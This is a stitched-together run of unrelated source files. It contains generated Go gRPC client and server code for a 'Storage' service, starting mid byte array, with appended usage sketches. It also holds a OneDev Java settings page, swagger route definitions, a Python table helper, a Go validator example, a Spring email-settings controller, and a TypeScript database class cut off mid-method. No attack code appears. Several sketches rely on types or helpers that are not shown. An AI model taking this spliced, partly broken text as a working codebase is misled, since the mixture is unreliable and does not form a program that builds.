0x3c, 0x53, 0x4f, 0x09, 0x4f, 0xc6, 0xdb, 0x03, 0xbf, 0x67, 0x1a, 0x0b, 0x77, 0xf9, 0x5b, 0x8a, 0x18, 0xa0, 0x76, 0xf6, 0xcc, 0x19, 0xfe, 0x7b, 0x9f, 0x99, 0x0a, 0xfe, 0x52, 0x53, 0xe5, 0xbf, 0x1b, 0xcc, 0xd4, 0xf0, 0x97, 0x9a, 0x05, 0xfe, 0xfb, 0x88, 0x9a, 0x3a, 0xff, 0xed, 0x06, 0xa6, 0xb1, 0x70, 0x13, 0x66, 0xb3, 0x4f, 0x17, 0x52, 0x04, 0x6d, 0x93, 0x32, 0x73, 0x86, 0x94, 0xa0, 0xd0, 0x0d, 0x7a, 0x91, 0xa9, 0x70, 0xd2, 0x3d, 0xcf, 0x13, 0x36, 0x3a, 0x74, 0x18, 0xee, 0x73, 0x47, 0x37, 0x32, 0x8f, 0x18, 0x61, 0x70, 0xe4, 0x07, 0x7d, 0x73, 0x86, 0x94, 0x41, 0xef, 0x06, 0xec, 0xe6, 0x75, 0x71, 0xb0, 0x1b, 0x30, 0x71, 0xb0, 0x1d, 0x8e, 0xb7, 0x07, 0xd4, 0xd4, 0xf8, 0xbd, 0xab, 0x61, 0x38, 0x30, 0x0b, 0x5c, 0x72, 0x75, 0xc2, 0x68, 0x6c, 0xea, 0x0b, 0x17, 0xa1, 0x28, 0xcb, 0x0d, 0xb5, 0xc5, 0x3d, 0x61, 0x40, 0x9b, 0xc6, 0x3d, 0x53, 0x69, 0xfd, 0x52, 0x80, 0xe2, 0xa6, 0x18, 0xd3, 0x49, 0x13, 0x2a, 0xde, 0x74, 0x6e, 0x20, 0x62, 0x4a, 0xca, 0x4f, 0x12, 0x35, 0x39, 0x3a, 0xf0, 0x97, 0x2b, 0xb9, 0x92, 0xc8, 0x8b, 0x69, 0x3c, 0x33, 0x2a, 0xe4, 0xc4, 0xae, 0x82, 0x81, 0x83, 0x03, 0x25, 0x02, 0xdf, 0x0f, 0xce, 0x0c, 0x35, 0xd9, 0x77, 0x48, 0x53, 0xce, 0x20, 0x34, 0xe9, 0x11, 0x44, 0x4c, 0x74, 0x99, 0xc1, 0x20, 0x77, 0x71, 0x13, 0xaa, 0x11, 0xc6, 0xec, 0x98, 0xf2, 0xb7, 0xf2, 0x7d, 0x8a, 0x9c, 0x39, 0xdc, 0xa1, 0xe8, 0x5e, 0xed, 0x70, 0xdf, 0x22, 0x0d, 0x28, 0xf5, 0x71, 0x4a, 0xf0, 0x62, 0xa9, 0x22, 0x33, 0x34, 0x24, 0x2a, 0x10, 0xed, 0xaf, 0x01, 0xf4, 0x53, 0x48, 0x25, 0xe4, 0x30, 0xc6, 0x4a, 0x69, 0xd1, 0x78, 0x5a, 0x30, 0x37, 0xce, 0x42, 0x9e, 0x0c, 0xd0, 0x41, 0x18, 0xcc, 0x39, 0xd1, 0x80, 0x52, 0x2c, 0xb1, 0x49, 0xda, 0x92, 0x81, 0xaa, 0x9c, 0xe4, 0x3c, 0x18, 0x1e, 0x56, 0x08, 0xa9, 0xca, 0x4c, 0x4a, 0x2c, 0xc9, 0x49, 0xfd, 0x0f, 0xca, 0xfd, 0x04, 0x01, 0xc8, 0xe9, 0xc4, 0xe0, 0x14, 0x11, 0x6a, 0xd9, 0x8e, 0xbf, 0x6d, 0xe0, 0x7f, 0x60, 0x56, 0xfe, 0x0c, 0x00, 0x00, 0xff, 0xff, 0xdd, 0x0c, 0x59, 0xa1, 0xda, 0x11, 0x00, 0x00, } // Reference imports to suppress errors if they are not otherwise used. var _ context.Context var _ grpc.ClientConn // This is a compile-time assertion to ensure that this generated file // is compatible with the grpc package it is being compiled against. const _ = grpc.SupportPackageIsVersion4 // StorageClient is the client API for Storage service. // // For semantics around ctx use and closing/ending streaming RPCs, please refer to https://godoc.org/google.golang.org/grpc#ClientConn.NewStream. 
type StorageClient interface { DefineEType(ctx context.Context, in *DefineETypeReq, opts ...grpc.CallOption) (*Empty, error) DefineRType(ctx context.Context, in *RType, opts ...grpc.CallOption) (*Empty, error) Create(ctx context.Context, in *CreateEWithRsReq, opts ...grpc.CallOption) (*E, error) CreateRelation(ctx context.Context, in *RelationReq, opts ...grpc.CallOption) (*Empty, error) RemoveRelation(ctx context.Context, in *RelationReq, opts ...grpc.CallOption) (*Empty, error) HasRelations(ctx context.Context, in *HasRelationsReq, opts ...grpc.CallOption) (*HasRelations, error) GetByIds(ctx context.Context, in *GetByIDsReq, opts ...grpc.CallOption) (*EList, error) GetByQuery(ctx context.Context, in *GetByQueryReq, opts ...grpc.CallOption) (*Paged, error) UpdateContent(ctx context.Context, in *UpdateContentReq, opts ...grpc.CallOption) (*Empty, error) SetState(ctx context.Context, in *SetStateReq, opts ...grpc.CallOption) (*Empty, error) Delete(ctx context.Context, in *DeleteReq, opts ...grpc.CallOption) (*Empty, error) GetCounts(ctx context.Context, in *GetCountsReq, opts ...grpc.CallOption) (*Counts, error) } type storageClient struct { cc *grpc.ClientConn } func NewStorageClient(cc *grpc.ClientConn) StorageClient { return &storageClient{cc} } func (c *storageClient) DefineEType(ctx context.Context, in *DefineETypeReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/defineEType", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) DefineRType(ctx context.Context, in *RType, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/defineRType", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) Create(ctx context.Context, in *CreateEWithRsReq, opts ...grpc.CallOption) (*E, error) { out := new(E) err := c.cc.Invoke(ctx, "/def.Storage/create", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) CreateRelation(ctx context.Context, in *RelationReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/createRelation", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) RemoveRelation(ctx context.Context, in *RelationReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/removeRelation", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) HasRelations(ctx context.Context, in *HasRelationsReq, opts ...grpc.CallOption) (*HasRelations, error) { out := new(HasRelations) err := c.cc.Invoke(ctx, "/def.Storage/hasRelations", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) GetByIds(ctx context.Context, in *GetByIDsReq, opts ...grpc.CallOption) (*EList, error) { out := new(EList) err := c.cc.Invoke(ctx, "/def.Storage/getByIds", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) GetByQuery(ctx context.Context, in *GetByQueryReq, opts ...grpc.CallOption) (*Paged, error) { out := new(Paged) err := c.cc.Invoke(ctx, "/def.Storage/getByQuery", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) UpdateContent(ctx context.Context, in *UpdateContentReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/updateContent", in, out, opts...) 
if err != nil { return nil, err } return out, nil } func (c *storageClient) SetState(ctx context.Context, in *SetStateReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/setState", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) Delete(ctx context.Context, in *DeleteReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/delete", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) GetCounts(ctx context.Context, in *GetCountsReq, opts ...grpc.CallOption) (*Counts, error) { out := new(Counts) err := c.cc.Invoke(ctx, "/def.Storage/getCounts", in, out, opts...) if err != nil { return nil, err } return out, nil } // StorageServer is the server API for Storage service. type StorageServer interface { DefineEType(context.Context, *DefineETypeReq) (*Empty, error) DefineRType(context.Context, *RType) (*Empty, error) Create(context.Context, *CreateEWithRsReq) (*E, error) CreateRelation(context.Context, *RelationReq) (*Empty, error) RemoveRelation(context.Context, *RelationReq) (*Empty, error) HasRelations(context.Context, *HasRelationsReq) (*HasRelations, error) GetByIds(context.Context, *GetByIDsReq) (*EList, error) GetByQuery(context.Context, *GetByQueryReq) (*Paged, error) UpdateContent(context.Context, *UpdateContentReq) (*Empty, error) SetState(context.Context, *SetStateReq) (*Empty, error) Delete(context.Context, *DeleteReq) (*Empty, error) GetCounts(context.Context, *GetCountsReq) (*Counts, error) } // UnimplementedStorageServer can be embedded to have forward compatible implementations. type UnimplementedStorageServer struct { } func (*UnimplementedStorageServer) DefineEType(ctx context.Context, req *DefineETypeReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method DefineEType not implemented") } func (*UnimplementedStorageServer) DefineRType(ctx context.Context, req *RType) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method DefineRType not implemented") } func (*UnimplementedStorageServer) Create(ctx context.Context, req *CreateEWithRsReq) (*E, error) { return nil, status.Errorf(codes.Unimplemented, "method Create not implemented") } func (*UnimplementedStorageServer) CreateRelation(ctx context.Context, req *RelationReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method CreateRelation not implemented") } func (*UnimplementedStorageServer) RemoveRelation(ctx context.Context, req *RelationReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method RemoveRelation not implemented") } func (*UnimplementedStorageServer) HasRelations(ctx context.Context, req *HasRelationsReq) (*HasRelations, error) { return nil, status.Errorf(codes.Unimplemented, "method HasRelations not implemented") } func (*UnimplementedStorageServer) GetByIds(ctx context.Context, req *GetByIDsReq) (*EList, error) { return nil, status.Errorf(codes.Unimplemented, "method GetByIds not implemented") } func (*UnimplementedStorageServer) GetByQuery(ctx context.Context, req *GetByQueryReq) (*Paged, error) { return nil, status.Errorf(codes.Unimplemented, "method GetByQuery not implemented") } func (*UnimplementedStorageServer) UpdateContent(ctx context.Context, req *UpdateContentReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method UpdateContent not implemented") } func (*UnimplementedStorageServer) SetState(ctx context.Context, req 
*SetStateReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method SetState not implemented") } func (*UnimplementedStorageServer) Delete(ctx context.Context, req *DeleteReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method Delete not implemented") } func (*UnimplementedStorageServer) GetCounts(ctx context.Context, req *GetCountsReq) (*Counts, error) { return nil, status.Errorf(codes.Unimplemented, "method GetCounts not implemented") } func RegisterStorageServer(s *grpc.Server, srv StorageServer) { s.RegisterService(&_Storage_serviceDesc, srv) } func _Storage_DefineEType_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(DefineETypeReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).DefineEType(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/DefineEType", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).DefineEType(ctx, req.(*DefineETypeReq)) } return interceptor(ctx, in, info, handler) } func _Storage_DefineRType_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(RType) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).DefineRType(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/DefineRType", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).DefineRType(ctx, req.(*RType)) } return interceptor(ctx, in, info, handler) } func _Storage_Create_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(CreateEWithRsReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).Create(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/Create", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).Create(ctx, req.(*CreateEWithRsReq)) } return interceptor(ctx, in, info, handler) } func _Storage_CreateRelation_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(RelationReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).CreateRelation(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/CreateRelation", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).CreateRelation(ctx, req.(*RelationReq)) } return interceptor(ctx, in, info, handler) } func _Storage_RemoveRelation_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(RelationReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).RemoveRelation(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/RemoveRelation", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).RemoveRelation(ctx, req.(*RelationReq)) } return interceptor(ctx, in, info, handler) } func 
_Storage_HasRelations_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(HasRelationsReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).HasRelations(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/HasRelations", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).HasRelations(ctx, req.(*HasRelationsReq)) } return interceptor(ctx, in, info, handler) } func _Storage_GetByIds_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(GetByIDsReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).GetByIds(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/GetByIds", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).GetByIds(ctx, req.(*GetByIDsReq)) } return interceptor(ctx, in, info, handler) } func _Storage_GetByQuery_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(GetByQueryReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).GetByQuery(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/GetByQuery", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).GetByQuery(ctx, req.(*GetByQueryReq)) } return interceptor(ctx, in, info, handler) } func _Storage_UpdateContent_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(UpdateContentReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).UpdateContent(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/UpdateContent", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).UpdateContent(ctx, req.(*UpdateContentReq)) } return interceptor(ctx, in, info, handler) } func _Storage_SetState_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(SetStateReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).SetState(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/SetState", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).SetState(ctx, req.(*SetStateReq)) } return interceptor(ctx, in, info, handler) } func _Storage_Delete_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(DeleteReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).Delete(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/Delete", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).Delete(ctx, req.(*DeleteReq)) } return interceptor(ctx, in, info, handler) } func _Storage_GetCounts_Handler(srv interface{}, ctx 
context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(GetCountsReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).GetCounts(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/GetCounts", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).GetCounts(ctx, req.(*GetCountsReq)) } return interceptor(ctx, in, info, handler) } var _Storage_serviceDesc = grpc.ServiceDesc{ ServiceName: "def.Storage", HandlerType: (*StorageServer)(nil), Methods: []grpc.MethodDesc{ { MethodName: "defineEType", Handler: _Storage_DefineEType_Handler, }, { MethodName: "defineRType", Handler: _Storage_DefineRType_Handler, }, { MethodName: "create", Handler: _Storage_Create_Handler, }, { MethodName: "createRelation", Handler: _Storage_CreateRelation_Handler, }, { MethodName: "removeRelation", Handler: _Storage_RemoveRelation_Handler, }, { MethodName: "hasRelations", Handler: _Storage_HasRelations_Handler, }, { MethodName: "getByIds", Handler: _Storage_GetByIds_Handler, }, { MethodName: "getByQuery", Handler: _Storage_GetByQuery_Handler, }, { MethodName: "updateContent", Handler: _Storage_UpdateContent_Handler, }, { MethodName: "setState", Handler: _Storage_SetState_Handler, }, { MethodName: "delete", Handler: _Storage_Delete_Handler, }, { MethodName: "getCounts", Handler: _Storage_GetCounts_Handler, }, }, Streams: []grpc.StreamDesc{}, Metadata: "storage.proto", }
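// ---------------------------------------------------------------------------
// Illustrative usage sketch -- an editor's addition, NOT part of the generated
// file above. It shows one plausible way to register and call the Storage
// service. The listen address, the hypothetical "article" entity type, and the
// query values are invented for demonstration; adjust them to your deployment.
// ---------------------------------------------------------------------------
package def

import (
	"context"
	"fmt"
	"net"
	"time"

	"google.golang.org/grpc"
)

// storageServer embeds UnimplementedStorageServer so that any RPC we have not
// implemented yet returns codes.Unimplemented instead of breaking compilation
// when the service definition grows.
type storageServer struct {
	UnimplementedStorageServer
}

// Serve exposes the Storage service on addr (e.g. ":50051").
func Serve(addr string) error {
	lis, err := net.Listen("tcp", addr)
	if err != nil {
		return err
	}
	s := grpc.NewServer()
	RegisterStorageServer(s, &storageServer{})
	return s.Serve(lis)
}

// ListPublished dials the Storage service and fetches one page of entities of
// a hypothetical "article" type whose State field equals "published".
// grpc.WithInsecure is fine for a local sketch; production code should
// configure transport credentials instead.
func ListPublished(addr string) error {
	conn, err := grpc.Dial(addr, grpc.WithInsecure())
	if err != nil {
		return err
	}
	defer conn.Close()

	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer cancel()

	page, err := NewStorageClient(conn).GetByQuery(ctx, &GetByQueryReq{
		Type: "article",
		Queries: []*Query{
			{Field: "State", Op: Op_Eq, Value: "published", ValueType: ValueType_String},
		},
		Limit: &Limit{Limit: 20},
	})
	if err != nil {
		return err
	}
	for _, e := range page.GetList() {
		fmt.Println(e) // each entry is a *E; String() gives the compact text form
	}
	return nil
}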
package io.onedev.server.web.page.admin.performancesetting;

import org.apache.wicket.Component;
import org.apache.wicket.markup.html.basic.Label;
import org.apache.wicket.markup.html.form.Form;
import org.apache.wicket.request.mapper.parameter.PageParameters;

import io.onedev.server.OneDev;
import io.onedev.server.entitymanager.SettingManager;
import io.onedev.server.model.support.administration.PerformanceSetting;
import io.onedev.server.web.editable.BeanContext;
import io.onedev.server.web.page.admin.AdministrationPage;

@SuppressWarnings("serial")
public class PerformanceSettingPage extends AdministrationPage {

	public PerformanceSettingPage(PageParameters params) {
		super(params);
	}

	@Override
	protected void onInitialize() {
		super.onInitialize();

		PerformanceSetting performanceSetting = OneDev.getInstance(SettingManager.class).getPerformanceSetting();

		Form<?> form = new Form<Void>("form") {

			@Override
			protected void onSubmit() {
				super.onSubmit();

				OneDev.getInstance(SettingManager.class).savePerformanceSetting(performanceSetting);
				getSession().success("Performance setting has been saved");

				setResponsePage(PerformanceSettingPage.class);
			}

		};
		form.add(BeanContext.edit("editor", performanceSetting));

		add(form);
	}

	@Override
	protected Component newTopbarTitle(String componentId) {
		return new Label(componentId, "Performance Setting");
	}

}
package definitions

// swagger:route GET /api/v1/provisioning/policies provisioning stable RouteGetPolicyTree
//
// Get the notification policy tree.
//
// Responses:
//   200: Route
//        description: The currently active notification routing tree

// swagger:route PUT /api/v1/provisioning/policies provisioning stable RoutePutPolicyTree
//
// Sets the notification policy tree.
//
// Consumes:
//   - application/json
//
// Responses:
//   202: Ack
//   400: ValidationError

// swagger:route DELETE /api/v1/provisioning/policies provisioning stable RouteResetPolicyTree
//
// Clears the notification policy tree.
//
// Consumes:
//   - application/json
//
// Responses:
//   202: Ack

// swagger:parameters RoutePutPolicyTree
type Policytree struct {
	// The new notification routing tree to use
	// in:body
	Body Route
}
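// ---------------------------------------------------------------------------
// Illustrative sketch -- an editor's addition, not part of the definitions
// file above. It drives the documented PUT route with plain net/http. The base
// URL and the basic-auth credentials are assumptions for demonstration; the
// payload must be a JSON-encoded Route (the notification routing tree).
// ---------------------------------------------------------------------------
package definitions

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
)

// putPolicyTree replaces the notification policy tree, mirroring the
// RoutePutPolicyTree route above. Per the swagger annotations, a 202 response
// acknowledges the new tree and a 400 signals a validation error.
func putPolicyTree(baseURL, user, pass string, body []byte) error {
	req, err := http.NewRequest(http.MethodPut, baseURL+"/api/v1/provisioning/policies", bytes.NewReader(body))
	if err != nil {
		return err
	}
	req.SetBasicAuth(user, pass)
	req.Header.Set("Content-Type", "application/json")

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusAccepted {
		msg, _ := io.ReadAll(resp.Body)
		return fmt.Errorf("unexpected status %d: %s", resp.StatusCode, msg)
	}
	return nil
}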
import copy
from collections import OrderedDict

# `table` is assumed to be a helper defined elsewhere in this module that
# builds a text table (with an `align` mapping) from the field map and rows.


def package_search_table(search_results):
    """Render package search results as a left-aligned text table."""
    fields = OrderedDict([
        ('NAME', lambda p: p['name']),
        ('VERSION', lambda p: p['currentVersion']),
        ('SELECTED', lambda p: p.get("selected", False)),
        ('FRAMEWORK', lambda p: p['framework']),
        # Descriptions of 77+ characters are cut to their first 77 characters
        # and suffixed with an ellipsis
        ('DESCRIPTION', lambda p: p['description']
            if len(p['description']) < 77
            else p['description'][0:77] + "..."),
    ])

    # Deep-copy each package so rendering cannot mutate the caller's results
    packages = []
    for package in search_results['packages']:
        package_ = copy.deepcopy(package)
        packages.append(package_)

    tb = table(fields, packages)
    tb.align['NAME'] = 'l'
    tb.align['VERSION'] = 'l'
    tb.align['SELECTED'] = 'l'
    tb.align['FRAMEWORK'] = 'l'
    tb.align['DESCRIPTION'] = 'l'

    return tb
// ExampleRegisterValidator registers a custom validator under the name
// `check_xyzUser`. It checks that the configuration value for route
// `payment/serviceX/username` equals the string `xyzUser` (a deliberately
// simple example). The validator `check_xyzUser` gets activated for route
// `payment/serviceX/username` with event after_get.
func ExampleRegisterValidator() {
	observer.RegisterValidator("check_xyzUser", func(s string) bool {
		return s == "xyzUser"
	})

	cfgSrv := config.MustNewService(storage.NewMap(
		"stores/2/payment/serviceX/username", "xyzUser",
		"stores/3/payment/serviceX/username", "abcUser",
	), config.Options{})

	err := observer.RegisterWithJSON(cfgSrv, bytes.NewBufferString(`{"Collection":[
		{
			"event":"after_get",
			"route":"payment/serviceX/username",
			"type":"validator",
			"condition":{"funcs":["utf8","check_xyzUser"]}
		}
	]}`))
	if err != nil {
		fmt.Printf("%+v\n", err)
		return
	}

	ps2 := config.MustNewPath("payment/serviceX/username").BindStore(2)

	val := cfgSrv.Get(ps2)
	fmt.Printf("%s\n", val.String())

	val = cfgSrv.Get(ps2.BindStore(3))
	fmt.Printf("%s\n", val.Error())
}
package com.kollect.etl.controller.app;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam;

import com.kollect.etl.service.app.EmailSettingsService;

@Controller
public class EmailSettingsController {

  @Autowired
  private EmailSettingsService emailSettingsService;

  /**
   * HTTP GET request to retrieve email settings.
   *
   * @param model
   *          a data structure of objects which needs to be rendered to the view
   * @return emailSettingsForm pre-loaded with data
   */
  @GetMapping(value = "/adminEmailSettings")
  public Object viewEmailSettings(Model model) {
    return this.emailSettingsService.getEmailSettings(model);
  }

  /**
   * HTTP POST request mapping to create or update email settings.
   *
   * @param sendEmail
   *          flag for sending or not sending email
   * @param userAuthentication
   *          main authentication user
   * @param userName
   *          the user who's sending the email
   * @param pass
   *          the password of the sending user's account
   * @param host
   *          SMTP server name
   * @param recipient
   *          a comma-separated list of recipients
   * @param port
   *          SMTP server port
   * @param subject
   *          email subject for successful status
   * @param msg
   *          email message content for successful status
   * @param subjErr
   *          email subject for unsuccessful status
   * @param msgErr
   *          email message content for unsuccessful status
   * @return redirects requests to GET /adminEmailSettings
   */
  @RequestMapping(value = "/adminEmailSettings", method = RequestMethod.POST)
  public Object addEmailSettings(@RequestParam(required = false) boolean sendEmail,
      @RequestParam String userAuthentication,
      @RequestParam String userName,
      @RequestParam String pass,
      @RequestParam String host,
      @RequestParam String recipient,
      @RequestParam Integer port,
      @RequestParam String subject,
      @RequestParam String msg,
      @RequestParam String subjErr,
      @RequestParam String msgErr) {
    // Persist the settings, then redirect back to the GET view
    this.emailSettingsService.addUpdateEmailSettings(sendEmail, userAuthentication, userName, pass, host,
        recipient, port, subject, msg, subjErr, msgErr);
    return "redirect:/adminEmailSettings";
  }
}
import * as _ from 'lodash'
import * as T from './types'
import * as Pg from 'pg'
import * as P from './parser'
import * as Util from './util'
import * as Uuid from 'uuid'
import { EventEmitter } from 'events'
import * as E from './errors'
import { parseSql } from 'tinypg-parser'
import { createHash } from 'crypto'

const PgFormat = require('@scaleleap/pg-format')
const Debug = require('debug')

const log = Debug('tinypg')

interface TinyQuery extends Pg.Query {
   callback?(err: Error, result: any): void
}

export class TinyPg {
   public events: T.TinyPgEvents
   public pool: Pg.Pool
   public sql_db_calls: { [key: string]: DbCall }

   private hooks: T.TinyHooks[]
   private error_transformer: E.TinyPgErrorTransformer
   private sql_files: T.SqlFile[]
   private options: T.TinyPgOptions
   private transaction_id?: string

   constructor(options: T.TinyPgOptions) {
      options = _.isNil(options) ? {} : options

      this.events = new EventEmitter()
      this.error_transformer = _.isFunction(options.error_transformer) ? options.error_transformer : _.identity
      this.options = options
      this.hooks = _.isNil(this.options.hooks) ? [] : [this.options.hooks]

      const pool_options = _.isNil(options.pool_options) ? {} : options.pool_options

      const pool_config: Pg.PoolConfig & { log: any } = {
         connectionString: options.connection_string,
         keepAlive: pool_options.keep_alive,
         connectionTimeoutMillis: pool_options.connection_timeout_ms,
         idleTimeoutMillis: pool_options.idle_timeout_ms,
         application_name: pool_options.application_name,
         statement_timeout: pool_options.statement_timeout_ms,
         max: pool_options.max,
         min: pool_options.min,
         log: Debug('tinypg:pool'),
      }

      this.pool = new Pg.Pool(pool_config)

      this.pool.on('error', error => {
         log('Error with idle client in pool.', error)
      })

      this.sql_files = P.parseFiles(_.compact(_.castArray(options.root_dir)))

      const db_calls = _.map(this.sql_files, sql_file => {
         return new DbCall({
            name: sql_file.name,
            key: sql_file.key,
            text: sql_file.text,
            parameterized_query: sql_file.parsed.parameterized_sql,
            parameter_map: sql_file.parsed.mapping,
            prepared: _.defaultTo(options.use_prepared_statements, false),
         })
      })

      this.sql_db_calls = _.keyBy(db_calls, x => x.config.key!)
   }

   query<T extends object = any, P extends T.TinyPgParams = T.TinyPgParams>(raw_sql: string, params?: P): Promise<T.Result<T>> {
      const query_id = Uuid.v4()
      const hook_lifecycle = this.makeHooksLifeCycle()

      const [new_query, new_params] = hook_lifecycle.preRawQuery({ query_id: query_id, transaction_id: this.transaction_id }, [raw_sql, params]).args

      return Util.stackTraceAccessor(this.options.capture_stack_trace!, async () => {
         const parsed = parseSql(raw_sql)

         const db_call = new DbCall({
            name: 'raw_query',
            key: createHash('md5').update(parsed.parameterized_sql).digest('hex'),
            text: new_query,
            parameterized_query: parsed.parameterized_sql,
            parameter_map: parsed.mapping,
            prepared: false,
         })

         return await this.performDbCall(db_call, hook_lifecycle, new_params, query_id)
      })
   }

   sql<T extends object = any, P extends T.TinyPgParams = T.TinyPgParams>(name: string, params?: P): Promise<T.Result<T>> {
      const query_id = Uuid.v4()
      const hook_lifecycle = this.makeHooksLifeCycle()

      const [, new_params] = hook_lifecycle.preSql({ query_id: query_id, transaction_id: this.transaction_id }, [name, params]).args

      return Util.stackTraceAccessor(this.options.capture_stack_trace!, async () => {
         log('sql', name)

         const db_call: DbCall = this.sql_db_calls[name]

         if (_.isNil(db_call)) {
            throw new Error(`Sql query with name [${name}] not found!`)
         }

         return this.performDbCall(db_call, hook_lifecycle, new_params, query_id)
      })
   }

   transaction<T = any>(tx_fn: (db: TinyPg) => Promise<T>): Promise<T> {
      const transaction_id = Uuid.v4()
      const hook_lifecycle = this.makeHooksLifeCycle()
      hook_lifecycle.preTransaction(transaction_id)

      return Util.stackTraceAccessor(this.options.capture_stack_trace!, async () => {
         log('transaction')

